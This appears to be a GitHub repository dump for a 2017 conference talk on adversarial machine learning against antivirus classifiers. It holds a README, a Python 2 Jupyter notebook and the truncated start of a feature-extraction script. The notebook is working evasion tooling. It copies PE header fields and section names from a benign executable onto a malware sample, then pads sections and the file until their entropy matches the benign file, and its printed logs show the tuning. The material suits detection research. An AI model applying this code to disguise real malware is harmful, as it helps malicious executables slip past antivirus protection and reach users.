├── Adversarial Machine Learning for AV software.pdf ├── README.md ├── adversarial_model_for_av.ipynb └── extract.py /Adversarial Machine Learning for AV software.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nababora/advML/2cbc3351a2b1579a1465655df52c41369182bd50/Adversarial Machine Learning for AV software.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Adversarial Machine Learning for Anti-Malware Software 2 | 3 | presented in Secuinside 2017 @nababora 4 | 5 | Introduce practical guidances for developing adversarial machine model for anti-malware software. 6 | I didn't use reinforcement model yet, just proof-of-concept. 7 | 8 | 9 | -------------------------------------------------------------------------------- /adversarial_model_for_av.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 13, 6 | "metadata": { 7 | "collapsed": true 8 | }, 9 | "outputs": [], 10 | "source": [ 11 | "import csv, os, pefile\n", 12 | "import math\n", 13 | "import array\n", 14 | "import random\n", 15 | "import pandas as pd\n", 16 | "\n", 17 | "import extract\n", 18 | "\n", 19 | "class Make_good():\n", 20 | "\n", 21 | " def __init__(self,benign,malware):\n", 22 | "\n", 23 | " header = ['e_cblp','e_cp','e_cparhdr','e_maxalloc','e_sp','e_lfanew',\\\n", 24 | " 'NumofSections','CreationYear','FH3_local_sym','FH4_ws_trim','FH11_file_system','FH13_up_system',\\\n", 25 | " 'Majorlinker','Minorlinker','SizeCode','InitialSize','UninitialSize','EntryPoint','BaseCode','BaseData',\\\n", 26 | " 'MajorOS','MinorOS','MajorImage','MinorImage','MajorSub','MinorSub','Checksum','Subsystem',\\\n", 27 | " 'SReserve','SCommit','HReserve','HCommit','LoaderFlags','DLL3','DLL4','DLL6'] #,'sus_sec','e_file','non_sus_sec','packer','e_text','e_data','filesize']\n", 28 | "\n", 29 | " self.benign_path = benign\n", 30 | " self.malware_path = malware \n", 31 | " self.total_list = pd.DataFrame(columns=header)\n", 32 | "\n", 33 | " def print_data(self, pe, clas):\n", 34 | "\n", 35 | " if clas == 1:\n", 36 | " msg = \"Malware\"\n", 37 | " else:\n", 38 | " msg = \"Benign\"\n", 39 | "\n", 40 | " dat = self.get_dos_data(pe) + self.get_file_data(pe) + self.get_optional_data(pe)\n", 41 | " self.total_list.loc[len(self.total_list)] = dat\n", 42 | "\n", 43 | " \n", 44 | " def get_dos_data(self, pe):\n", 45 | "\n", 46 | " dos_data = [pe.DOS_HEADER.e_cblp, pe.DOS_HEADER.e_cp, pe.DOS_HEADER.e_cparhdr, pe.DOS_HEADER.e_maxalloc, pe.DOS_HEADER.e_sp, pe.DOS_HEADER.e_lfanew]\n", 47 | " self.total_list.append(dos_data)\n", 48 | " \n", 49 | " return dos_data\n", 50 | "\n", 51 | " def get_file_data(self, pe):\n", 52 | "\n", 53 | " seconds= pe.FILE_HEADER.TimeDateStamp\n", 54 | " creation_year = 1970 + ((int(seconds) / 86400) / 365)\n", 55 | " \n", 56 | " tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\\\n", 57 | " pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\\\n", 58 | " pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\\\n", 59 | " pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\\\n", 60 | " pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\\\n", 61 | " pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\\\n", 62 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\\\n", 63 | " pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\\\n", 64 | " pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\\\n", 65 | " pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\\\n", 66 | " pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\\\n", 67 | " pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\\\n", 68 | " pe.FILE_HEADER.IMAGE_FILE_DLL,\\\n", 69 | " pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\\\n", 70 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI\n", 71 | " ]\n", 72 | " \n", 73 | " \n", 74 | " file_data = [pe.FILE_HEADER.NumberOfSections, creation_year, int(tmp[3]), int(tmp[4]), int(tmp[11]), int(tmp[13])]\n", 75 | " \n", 76 | " return file_data\n", 77 | "\n", 78 | " def get_optional_data(self, pe):\n", 79 | "\n", 80 | " tmp = [\n", 81 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\\\n", 82 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\\\n", 83 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT ,\\\n", 84 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\\\n", 85 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\\\n", 86 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\\\n", 87 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\\\n", 88 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\\\n", 89 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\\\n", 90 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\\\n", 91 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF\n", 92 | " ]\n", 93 | " \n", 94 | " try:\n", 95 | " optional_data = [\n", 96 | " pe.OPTIONAL_HEADER.MajorLinkerVersion,\\\n", 97 | " pe.OPTIONAL_HEADER.MinorLinkerVersion,\\\n", 98 | " pe.OPTIONAL_HEADER.SizeOfCode,\\\n", 99 | " pe.OPTIONAL_HEADER.SizeOfInitializedData,\\\n", 100 | " pe.OPTIONAL_HEADER.SizeOfUninitializedData,\\\n", 101 | " pe.OPTIONAL_HEADER.AddressOfEntryPoint,\\\n", 102 | " pe.OPTIONAL_HEADER.BaseOfCode,\\\n", 103 | " pe.OPTIONAL_HEADER.BaseOfData,\\\n", 104 | " pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\\\n", 105 | " pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\\\n", 106 | " pe.OPTIONAL_HEADER.MajorImageVersion,\\\n", 107 | " pe.OPTIONAL_HEADER.MinorImageVersion,\\\n", 108 | " pe.OPTIONAL_HEADER.MajorSubsystemVersion,\\\n", 109 | " pe.OPTIONAL_HEADER.MinorSubsystemVersion,\\\n", 110 | " pe.OPTIONAL_HEADER.CheckSum,\\\n", 111 | " pe.OPTIONAL_HEADER.Subsystem,\n", 112 | " pe.OPTIONAL_HEADER.SizeOfStackReserve,\\\n", 113 | " pe.OPTIONAL_HEADER.SizeOfStackCommit,\\\n", 114 | " pe.OPTIONAL_HEADER.SizeOfHeapReserve,\\\n", 115 | " pe.OPTIONAL_HEADER.SizeOfHeapCommit,\\\n", 116 | " int(pe.OPTIONAL_HEADER.LoaderFlags == 0),\\\n", 117 | " int(tmp[3]), int(tmp[4]), int(tmp[6])]\n", 118 | "\n", 119 | " except Exception, e:\n", 120 | " print e \n", 121 | " \n", 122 | " return optional_data \n", 123 | "\n", 124 | " \n", 125 | " def write_dos_header(self, pe_b, pe_m):\n", 126 | " # total : 4\n", 127 | " pe_m.DOS_HEADER.e_cblp = pe_b.DOS_HEADER.e_cblp\n", 128 | " pe_m.DOS_HEADER.e_cparhdr = pe_b.DOS_HEADER.e_cparhdr\n", 129 | " pe_m.DOS_HEADER.e_maxalloc = pe_b.DOS_HEADER.e_maxalloc\n", 130 | " pe_m.DOS_HEADER.e_sp = pe_b.DOS_HEADER.e_sp\n", 131 | " \n", 132 | " def write_file_header(self, pe_b, pe_m): \n", 133 | " # total : 5\n", 134 | " pe_m.FILE_HEADER.TimeDateStamp = pe_b.FILE_HEADER.TimeDateStamp\n", 135 | " pe_m.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED = pe_b.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED\n", 136 | " pe_m.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM = pe_b.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM\n", 137 | " pe_m.FILE_HEADER.IMAGE_FILE_SYSTEM = pe_b.FILE_HEADER.IMAGE_FILE_SYSTEM \n", 138 | " pe_m.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY = pe_b.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY \n", 139 | " \n", 140 | "\n", 141 | " def write_optional_header(self, pe_b, pe_m):\n", 142 | " # total : 24\n", 143 | " pe_m.OPTIONAL_HEADER.MajorLinkerVersion = pe_b.OPTIONAL_HEADER.MajorLinkerVersion \n", 144 | " pe_m.OPTIONAL_HEADER.MinorLinkerVersion = pe_b.OPTIONAL_HEADER.MinorLinkerVersion\n", 145 | " pe_m.OPTIONAL_HEADER.SizeOfCode = pe_b.OPTIONAL_HEADER.SizeOfCode \n", 146 | " pe_m.OPTIONAL_HEADER.SizeOfInitializedData = pe_b.OPTIONAL_HEADER.SizeOfInitializedData\n", 147 | " pe_m.OPTIONAL_HEADER.SizeOfUninitializedData = pe_b.OPTIONAL_HEADER.SizeOfUninitializedData \n", 148 | " pe_m.OPTIONAL_HEADER.BaseOfCode = pe_b.OPTIONAL_HEADER.BaseOfCode \n", 149 | " pe_m.OPTIONAL_HEADER.BaseOfData = pe_b.OPTIONAL_HEADER.BaseOfData\n", 150 | " pe_m.OPTIONAL_HEADER.MajorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MajorOperatingSystemVersion\n", 151 | " pe_m.OPTIONAL_HEADER.MinorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MinorOperatingSystemVersion\n", 152 | " pe_m.OPTIONAL_HEADER.MajorImageVersion = pe_b.OPTIONAL_HEADER.MajorImageVersion\n", 153 | " pe_m.OPTIONAL_HEADER.MinorImageVersion = pe_b.OPTIONAL_HEADER.MinorImageVersion\n", 154 | " pe_m.OPTIONAL_HEADER.MajorSubsystemVersion = pe_b.OPTIONAL_HEADER.MajorSubsystemVersion\n", 155 | " pe_m.OPTIONAL_HEADER.MinorSubsystemVersion = pe_b.OPTIONAL_HEADER.MinorSubsystemVersion\n", 156 | " pe_m.OPTIONAL_HEADER.CheckSum = pe_b.OPTIONAL_HEADER.CheckSum\n", 157 | " pe_m.OPTIONAL_HEADER.Subsystem = pe_b.OPTIONAL_HEADER.Subsystem\n", 158 | " pe_m.OPTIONAL_HEADER.SizeOfStackReserve = pe_b.OPTIONAL_HEADER.SizeOfStackReserve\n", 159 | " pe_m.OPTIONAL_HEADER.SizeOfStackCommit = pe_b.OPTIONAL_HEADER.SizeOfStackCommit\n", 160 | " pe_m.OPTIONAL_HEADER.SizeOfHeapReserve = pe_b.OPTIONAL_HEADER.SizeOfHeapReserve\n", 161 | " pe_m.OPTIONAL_HEADER.SizeOfHeapCommit = pe_b.OPTIONAL_HEADER.SizeOfHeapCommit\n", 162 | " pe_m.OPTIONAL_HEADER.LoaderFlags = pe_b.OPTIONAL_HEADER.LoaderFlags\n", 163 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION\n", 164 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH\n", 165 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND\n", 166 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER\n", 167 | " \n", 168 | " \n", 169 | " def write_extra_info(self, pe_b, pe_m):\n", 170 | " # total : 2\n", 171 | " benign_sections = ['.text', '.rdata','.data','.idata','.edata','.rsrc','.bss','.crt','.tls']\n", 172 | " \n", 173 | " NumSection = pe_m.FILE_HEADER.NumberOfSections\n", 174 | " for i in range(0, NumSection):\n", 175 | " pe_m.sections[i].Name = benign_sections[i].encode()\n", 176 | " \n", 177 | " \n", 178 | " def get_start(self, mode):\n", 179 | "\n", 180 | " # get benign pe file with pefile \n", 181 | " try:\n", 182 | " pe_benign = pefile.PE(self.benign_path)\n", 183 | " except Exception, e:\n", 184 | " print \"{} while opening {}\".format(e,self.benign_path)\n", 185 | "\n", 186 | " # get malware pe file with pefile \n", 187 | " try:\n", 188 | " pe_malware = pefile.PE(self.malware_path)\n", 189 | " except Exception, e:\n", 190 | " print \"{} while opening {}\".format(e,self.malware_path)\n", 191 | "\n", 192 | " self.print_data(pe_benign, 0)\n", 193 | " self.print_data(pe_malware, 1)\n", 194 | " \n", 195 | " if mode == 1:\n", 196 | " self.write_dos_header(pe_benign, pe_malware)\n", 197 | " self.write_file_header(pe_benign, pe_malware)\n", 198 | " self.write_optional_header(pe_benign, pe_malware)\n", 199 | " self.write_extra_info(pe_benign, pe_malware)\n", 200 | "\n", 201 | " new_exe_path = \"malware_.exe\"\n", 202 | " pe_malware.write(new_exe_path)\n", 203 | " new_pe = pefile.PE(new_exe_path)\n", 204 | " \n", 205 | " return self.total_list\n", 206 | "\n", 207 | "\n", 208 | " " 209 | ] 210 | }, 211 | { 212 | "cell_type": "code", 213 | "execution_count": 2, 214 | "metadata": { 215 | "collapsed": true 216 | }, 217 | "outputs": [], 218 | "source": [ 219 | "def cal_byteFrequency(byteArr,fileSize):\n", 220 | " freqList = []\n", 221 | " for b in range(256):\n", 222 | " ctr = 0\n", 223 | " for byte in byteArr:\n", 224 | " if byte == b:\n", 225 | " ctr += 1\n", 226 | " freqList.append(float(ctr) / fileSize)\n", 227 | " return freqList\n", 228 | "\n", 229 | "def get_file_entropy(byteArr, fileSize):\n", 230 | " freqList = cal_byteFrequency(byteArr,fileSize)\n", 231 | " # Shannon entropy\n", 232 | " ent = 0.0\n", 233 | " for freq in freqList:\n", 234 | " if freq > 0:\n", 235 | " ent += - freq * math.log(freq, 2)\n", 236 | " return [fileSize,ent]\n", 237 | "\n", 238 | "def get_text_data_entropy(pe):\n", 239 | " result=[0.0, 0.0]\n", 240 | " \n", 241 | " for section in pe.sections:\n", 242 | " s_name = section.Name.split('\\x00')[0]\n", 243 | " if s_name == \".text\":\n", 244 | " result[0]= section.get_entropy()\n", 245 | " elif s_name == \".data\":\n", 246 | " result[1]= section.get_entropy()\n", 247 | " else:\n", 248 | " pass\n", 249 | " return result \n", 250 | "\n", 251 | "def get_file_bytes_size(filepath):\n", 252 | " f = open(filepath, \"rb\")\n", 253 | " byteArr = map(ord, f.read())\n", 254 | " f.close()\n", 255 | " fileSize = len(byteArr)\n", 256 | " return byteArr,fileSize\n" 257 | ] 258 | }, 259 | { 260 | "cell_type": "code", 261 | "execution_count": 3, 262 | "metadata": { 263 | "collapsed": true 264 | }, 265 | "outputs": [], 266 | "source": [ 267 | "def write_text_entropy(ben, mal, loo):\n", 268 | " \n", 269 | " ben_pe = pefile.PE(ben)\n", 270 | " mal_pe = pefile.PE(mal)\n", 271 | " \n", 272 | " ben_en = get_text_data_entropy(ben_pe)\n", 273 | " mal_en = get_text_data_entropy(mal_pe)\n", 274 | " \n", 275 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[0], \" mal: \", mal_en[0]\n", 276 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 277 | " \n", 278 | " insert_mul = loo\n", 279 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 280 | "\n", 281 | " for section in mal_pe.sections:\n", 282 | "\n", 283 | " s_name = section.Name.split('\\x00')[0]\n", 284 | " if s_name == \".text\":\n", 285 | " start = section.PointerToRawData + section.SizeOfRawData\n", 286 | " section.SizeOfRawData += text_padding\n", 287 | " end = section.PointerToRawData + section.SizeOfRawData\n", 288 | " else:\n", 289 | " section.PointerToRawData += text_padding\n", 290 | "\n", 291 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 292 | "\n", 293 | " mal_pe.write(after_t)\n", 294 | " mal_pe.__data__.close()\n", 295 | " bytearr, _ = get_file_bytes_size(after_t)\n", 296 | " \n", 297 | " if ben_en[0] > mal_en[0]:\n", 298 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 299 | " else:\n", 300 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 301 | "\n", 302 | " #print l, ar\n", 303 | " #print len(bytearr), bytearr[start:end]\n", 304 | "\n", 305 | " byte = array.array('B', bytearr).tostring()\n", 306 | " f = open(after_t, 'wb')\n", 307 | " f.write(byte)\n", 308 | " f.close()\n", 309 | "\n", 310 | " new_pe = pefile.PE(after_t)\n", 311 | " new_en = get_text_data_entropy(new_pe)\n", 312 | " bytearr, _ = get_file_bytes_size(after_t)\n", 313 | " #print bytearr[start:end], len(bytearr[start:end])\n", 314 | "\n", 315 | " diff = abs(new_en[0] - ben_en[0])\n", 316 | " print \"* text section entropy :\", mal_en[0], \"->\", new_en[0], \" diff: \", diff\n", 317 | "\n", 318 | " return diff, new_en[0]\n" 319 | ] 320 | }, 321 | { 322 | "cell_type": "code", 323 | "execution_count": 4, 324 | "metadata": { 325 | "collapsed": true 326 | }, 327 | "outputs": [], 328 | "source": [ 329 | "def write_data_entropy(ben, mal, loo):\n", 330 | " \n", 331 | " ben_pe = pefile.PE(ben)\n", 332 | " mal_pe = pefile.PE(mal)\n", 333 | " \n", 334 | " ben_en = get_text_data_entropy(ben_pe)\n", 335 | " mal_en = get_text_data_entropy(mal_pe)\n", 336 | " \n", 337 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[1], \" mal: \", mal_en[1]\n", 338 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 339 | " \n", 340 | " insert_mul = loo\n", 341 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 342 | "\n", 343 | " for section in mal_pe.sections:\n", 344 | "\n", 345 | " s_name = section.Name.split('\\x00')[0]\n", 346 | " if s_name == \".data\":\n", 347 | " start = section.PointerToRawData + section.SizeOfRawData\n", 348 | " section.SizeOfRawData += text_padding\n", 349 | " end = section.PointerToRawData + section.SizeOfRawData\n", 350 | " elif s_name != \".text\" and s_name != \".data\":\n", 351 | " section.PointerToRawData += text_padding\n", 352 | "\n", 353 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 354 | "\n", 355 | " mal_pe.write(after_d)\n", 356 | " mal_pe.__data__.close()\n", 357 | " bytearr, _ = get_file_bytes_size(after_d)\n", 358 | " if ben_en[1] > mal_en[1]:\n", 359 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 360 | " else:\n", 361 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 362 | "\n", 363 | " #print l, ar\n", 364 | " #print len(bytearr), bytearr[start:end]\n", 365 | "\n", 366 | " byte = array.array('B', bytearr).tostring()\n", 367 | " f = open(after_d, 'wb')\n", 368 | " f.write(byte)\n", 369 | " f.close()\n", 370 | "\n", 371 | " new_pe = pefile.PE(after_d)\n", 372 | " new_en = get_text_data_entropy(new_pe)\n", 373 | " bytearr, _ = get_file_bytes_size(after_d)\n", 374 | " #print bytearr[start:end], len(bytearr[start:end])\n", 375 | "\n", 376 | " diff = abs(new_en[1] - ben_en[1])\n", 377 | " print \"* data section entropy :\", mal_en[1], \"->\", new_en[1], \" diff: \", diff\n", 378 | "\n", 379 | " return diff, new_en[1]\n", 380 | "\n" 381 | ] 382 | }, 383 | { 384 | "cell_type": "code", 385 | "execution_count": 5, 386 | "metadata": { 387 | "collapsed": true 388 | }, 389 | "outputs": [], 390 | "source": [ 391 | "def write_file_entropy(ben, mal):\n", 392 | " \n", 393 | " save = 0\n", 394 | " rns = 0\n", 395 | " \n", 396 | " ben_byte, ben_size = get_file_bytes_size(ben)\n", 397 | " mal_byte, mal_size = get_file_bytes_size(mal)\n", 398 | "\n", 399 | " _, ben_en = get_file_entropy(ben_byte, ben_size)\n", 400 | " _, mal_en = get_file_entropy(mal_byte, mal_size)\n", 401 | " \n", 402 | " \n", 403 | " diff_bak = 10.0\n", 404 | " \n", 405 | " print \"File entropy before: \", ben_en, \" \", mal_en, \" diff_bak: \", diff_bak \n", 406 | " \n", 407 | " \n", 408 | " for di in range(1, 100):\n", 409 | " \n", 410 | " if save:\n", 411 | " di = di -1\n", 412 | " \n", 413 | " bytearr = mal_byte\n", 414 | " append_size = 4096*di\n", 415 | " \n", 416 | " if ben_en < mal_en:\n", 417 | " appen = [0 for i in xrange(append_size)]\n", 418 | " bytearr.extend(appen)\n", 419 | " else:\n", 420 | " appen = [random.sample(range(255), 1)[0] for i in xrange(append_size)]\n", 421 | " bytearr.extend(appen)\n", 422 | "\n", 423 | " size, ent = get_file_entropy(bytearr, (mal_size + append_size))\n", 424 | " diff = abs(ben_en - ent)\n", 425 | " print \"entropy after :\", mal_en, \" -> \", ent, \" diff: \", diff\n", 426 | "\n", 427 | " if diff_bak < diff:\n", 428 | " save = 1\n", 429 | "\n", 430 | " else:\n", 431 | " diff_bak = diff\n", 432 | " \n", 433 | " if save:\n", 434 | " rns = ent\n", 435 | " byte = array.array('B', bytearr).tostring()\n", 436 | " f = open(final, 'wb')\n", 437 | " f.write(byte)\n", 438 | " f.close()\n", 439 | " break\n", 440 | " \n", 441 | " return rns\n" 442 | ] 443 | }, 444 | { 445 | "cell_type": "code", 446 | "execution_count": 14, 447 | "metadata": {}, 448 | "outputs": [ 449 | { 450 | "name": "stdout", 451 | "output_type": "stream", 452 | "text": [ 453 | "[*] Before Crafting Malware Sample \n" 454 | ] 455 | }, 456 | { 457 | "data": { 458 | "text/html": [ 459 | "
\n", 460 | "\n", 473 | "\n", 474 | " \n", 475 | " \n", 476 | " \n", 477 | " \n", 478 | " \n", 479 | " \n", 480 | " \n", 481 | " \n", 482 | " \n", 483 | " \n", 484 | " \n", 485 | " \n", 486 | " \n", 487 | " \n", 488 | " \n", 489 | " \n", 490 | " \n", 491 | " \n", 492 | " \n", 493 | " \n", 494 | " \n", 495 | " \n", 496 | " \n", 497 | " \n", 498 | " \n", 499 | " \n", 500 | " \n", 501 | " \n", 502 | " \n", 503 | " \n", 504 | " \n", 505 | " \n", 506 | " \n", 507 | " \n", 508 | " \n", 509 | " \n", 510 | " \n", 511 | " \n", 512 | " \n", 513 | " \n", 514 | " \n", 515 | " \n", 516 | " \n", 517 | " \n", 518 | " \n", 519 | " \n", 520 | " \n", 521 | " \n", 522 | " \n", 523 | " \n", 524 | " \n", 525 | " \n", 526 | " \n", 527 | " \n", 528 | " \n", 529 | " \n", 530 | " \n", 531 | " \n", 532 | " \n", 533 | " \n", 534 | " \n", 535 | " \n", 536 | " \n", 537 | " \n", 538 | " \n", 539 | " \n", 540 | " \n", 541 | " \n", 542 | " \n", 543 | " \n", 544 | " \n", 545 | " \n", 546 | " \n", 547 | " \n", 548 | " \n", 549 | " \n", 550 | "
e_cblpe_cpe_cparhdre_maxalloce_spe_lfanewNumofSectionsCreationYearFH3_local_symFH4_ws_trim...ChecksumSubsystemSReserveSCommitHReserveHCommitLoaderFlagsDLL3DLL4DLL6
014434655351842805201700...2727685210485764096104857640961000
18024655351842568199210...6843322104857616384104857640961000
\n", 551 | "

2 rows × 36 columns

\n", 552 | "
" 553 | ], 554 | "text/plain": [ 555 | " e_cblp e_cp e_cparhdr e_maxalloc e_sp e_lfanew NumofSections CreationYear \\\n", 556 | "0 144 3 4 65535 184 280 5 2017 \n", 557 | "1 80 2 4 65535 184 256 8 1992 \n", 558 | "\n", 559 | " FH3_local_sym FH4_ws_trim ... Checksum Subsystem SReserve SCommit HReserve \\\n", 560 | "0 0 0 ... 2727685 2 1048576 4096 1048576 \n", 561 | "1 1 0 ... 684332 2 1048576 16384 1048576 \n", 562 | "\n", 563 | " HCommit LoaderFlags DLL3 DLL4 DLL6 \n", 564 | "0 4096 1 0 0 0 \n", 565 | "1 4096 1 0 0 0 \n", 566 | "\n", 567 | "[2 rows x 36 columns]" 568 | ] 569 | }, 570 | "execution_count": 14, 571 | "metadata": {}, 572 | "output_type": "execute_result" 573 | } 574 | ], 575 | "source": [ 576 | "ben = 'procexp.exe'\n", 577 | "mal = 'malware.exe'\n", 578 | "\n", 579 | "pe = Make_good(ben, mal)\n", 580 | "pd = pe.get_start(1)\n", 581 | "\n", 582 | "print \"[*] Before Crafting Malware Sample \"\n", 583 | "pd\n" 584 | ] 585 | }, 586 | { 587 | "cell_type": "code", 588 | "execution_count": null, 589 | "metadata": {}, 590 | "outputs": [ 591 | { 592 | "name": "stdout", 593 | "output_type": "stream", 594 | "text": [ 595 | "* text section entropy : 6.91707825321 -> 6.86794673205 diff: 0.390924178805\n", 596 | "* text section entropy : 6.91707825321 -> 6.81787533455 diff: 0.340852781302\n", 597 | "* text section entropy : 6.91707825321 -> 6.76718649884 diff: 0.290163945591\n", 598 | "* text section entropy : 6.91707825321 -> 6.71612682881 diff: 0.239104275563\n", 599 | "* text section entropy : 6.91707825321 -> 6.66488842358 diff: 0.187865870337\n", 600 | "* text section entropy : 6.91707825321 -> 6.61362299274 diff: 0.13660043949\n", 601 | "* text section entropy : 6.91707825321 -> 6.56245157824 diff: 0.0854290249906\n", 602 | "* text section entropy : 6.91707825321 -> 6.51147147146 diff: 0.0344489182086\n", 603 | "* text section entropy : 6.91707825321 -> 6.4607612684 diff: 0.0162612848483\n", 604 | "* text section entropy : 6.91707825321 -> 6.91707825321 diff: 0.440055699968\n", 605 | "* Final Text Section Entropy : 6.91707825321\n", 606 | "* data section entropy : 0.0 -> 7.54211511009 diff: 4.84998295094\n", 607 | "* data section entropy : 0.0 -> 7.79379731287 diff: 5.10166515371\n", 608 | "* data section entropy : 0.0 -> 7.60547841331 diff: 4.91334625416\n", 609 | "* Final Data Section Entropy : 7.60547841331\n" 610 | ] 611 | } 612 | ], 613 | "source": [ 614 | "mal = 'malware_.exe'\n", 615 | "after_t = 'mal_t.exe'\n", 616 | "after_d = 'mal_d.exe'\n", 617 | "final = 'mal_new.exe'\n", 618 | "\n", 619 | "count = 0\n", 620 | "diff_bak = 10\n", 621 | "\n", 622 | "for i in range(1, 10):\n", 623 | " diff, e = write_text_entropy(ben, mal, i) \n", 624 | " if diff_bak > diff:\n", 625 | " diff_bak = diff\n", 626 | " else:\n", 627 | " count = i-1\n", 628 | " break\n", 629 | "\n", 630 | "diff, e =write_text_entropy(ben, mal, count)\n", 631 | "\n", 632 | "print \"* Final Text Section Entropy : \", e\n", 633 | "\n", 634 | "count = 0\n", 635 | "diff_bak = 10\n", 636 | "\n", 637 | "for i in range(1, 30):\n", 638 | " diff, f = write_data_entropy(ben, after_t, i) \n", 639 | " if diff_bak > diff:\n", 640 | " diff_bak = diff\n", 641 | " else:\n", 642 | " count = i-1\n", 643 | " diff, f = write_data_entropy(ben, after_t, count)\n", 644 | " break\n", 645 | "\n", 646 | "print \"* Final Data Section Entropy : \", f\n", 647 | "\n", 648 | "\n", 649 | "ent = write_file_entropy(ben, after_d) \n", 650 | "print \"* Final File Entropy : \", ent\n" 651 | ] 652 | } 653 | ], 654 | "metadata": { 655 | "kernelspec": { 656 | "display_name": "Python 2", 657 | "language": "python", 658 | "name": "python2" 659 | }, 660 | "language_info": { 661 | "codemirror_mode": { 662 | "name": "ipython", 663 | "version": 2 664 | }, 665 | "file_extension": ".py", 666 | "mimetype": "text/x-python", 667 | "name": "python", 668 | "nbconvert_exporter": "python", 669 | "pygments_lexer": "ipython2", 670 | "version": "2.7.13" 671 | } 672 | }, 673 | "nbformat": 4, 674 | "nbformat_minor": 2 675 | } 676 | -------------------------------------------------------------------------------- /extract.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #Integrated Featrues extraction for ClaMP 3 | 4 | #Written by: Ajit kumar, urwithajit9@gmail.com ,25Feb2015 5 | #Thanx to Ero Carrera for creating pefile. https://github.com/erocarrera/pefile 6 | 7 | #No license required for any kind of reuse 8 | #If using this script for your work, please refer this on your willingness 9 | 10 | #input: Directory path of samples 11 | #File path of output (csv) 12 | # Class label 0,1 (clean,malware) 13 | 14 | #output: csv with all extracted features 15 | 16 | #import required python modules 17 | 18 | #Need to install yara and pefile external python module 19 | # Need to compile PEiD signatures as yara rules ( scripts are available online, later i will upload this too) 20 | 21 | # Change at line 79 self.rules= yara.compile(filepath='/home/user/ClaMP/yara/peid.yara') to your comple rules 22 | 23 | import csv,os,pefile 24 | import yara 25 | import math 26 | 27 | class PE_features(): 28 | 29 | IMAGE_DOS_HEADER = [ 30 | "e_cblp",\ 31 | 